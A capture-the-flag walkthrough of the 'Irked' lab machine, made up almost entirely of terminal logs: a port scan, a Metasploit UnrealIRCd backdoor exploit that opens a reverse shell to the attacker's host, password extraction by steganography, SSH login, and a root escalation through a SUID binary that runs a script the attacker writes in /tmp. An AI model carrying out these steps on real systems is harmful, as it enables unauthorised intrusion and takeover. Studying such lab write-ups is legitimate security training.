$ nmap -sC -sV -p- 10.10.10.117 Nmap scan report for 10.10.10.117 Host is up (0.23s latency). Not shown: 65528 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 39065/tcp6 status | 100024 1 47673/udp status | 100024 1 49431/tcp status |_ 100024 1 56811/udp6 status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 49431/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 1762.08 seconds
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 6667 yes The target port (TCP)
[*] Started reverse TCP double handler on 10.10.16.99:4444 [*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697... :irked.htb NOTICE AUTH :*** Looking up your hostname... [*] 10.10.10.117:6697 - Sending backdoor command... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo XSY6AWtTV0SElhyO; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "XSY6AWtTV0SElhyO\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (10.10.16.99:4444 -> 10.10.10.117:36674) at 2020-03-23 04:21:50 -0400
python tty shell
1 2 3 4 5 6 7 8 9 10 11 12 13
python -c 'import pty;pty.spawn("/bin/bash")' [email protected]:~/Unreal3.2$ id id uid=1001(ircd) gid=1001(ircd) groups=1001(ircd) [email protected]:~$ ls -la ls -la total 20 drwxr-xr-x 3 ircd root 4096 May 15 2018 . drwxr-xr-x 4 root root 4096 May 14 2018 .. -rw------- 1 ircd ircd 333 May 15 2018 .bash_history -rw-r--r-- 1 ircd ircd 0 May 14 2018 .bashrc -rw-r--r-- 1 ircd ircd 66 May 14 2018 .selected_editor drwx------ 13 ircd ircd 4096 Mar 22 18:37 Unreal3.2
[email protected]:~$ cat .bash_history cat .bash_history ls cat aliases ls keys ls keys ls keys/CVS cd keys ls file CVS cd CVS ls ls Root cat Root/Root cd Root ls file Root cat Root cd / ls cd /home ls cd djmardov ls ls * cd /tmp ls clear clear ls cd / ls cd /var/www/html ls cd /tmp sudo -i cd /home/ircd clear ls ls -lah cd .. ls cd djmardov ls cd Documents ls -lah cat .backup clear exit
$ steghide extract -sf irked.jpg Enter passphrase: wrote extracted data to "pass.txt". $ cat pass.txt Kab6h+m+bbp2J:HG
SSH port 22
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
$ ssh [email protected] The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established. ECDSA key fingerprint is SHA256:kunqU6QEf9TV3pbsZKznVcntLklRwiVobFZiJguYs4g. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.117' (ECDSA) to the list of known hosts. [email protected]'s password:
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue May 15 08:56:32 2018 from 10.33.3.3 [email protected]:~$ id uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth) [email protected]:~$ cat ~/Documents/user.txt 4a66a78b12dc0e661a59d3f5c0267a8e
[email protected]:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2020-03-22 18:37 (:0) djmardov pts/1 2020-03-23 09:52 (10.10.16.99) sh: 1: /tmp/listusers: not found
viewuser似乎尝试执行/tmp中名为listuser的不存在的脚本,向脚本中写入bash命令
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
[email protected]:/tmp$ touch listusers [email protected]:/tmp$ echo '#!/bin/bash' >> listusers [email protected]:/tmp$ echo '/bin/sh' >> listusers [email protected]:/tmp$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2020-03-22 18:37 (:0) djmardov pts/1 2020-03-23 09:52 (10.10.16.99) sh: 1: /tmp/listusers: Permission denied [email protected]:/tmp$ chmod 777 listusers [email protected]:/tmp$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2020-03-22 18:37 (:0) djmardov pts/1 2020-03-23 09:52 (10.10.16.99) # id uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)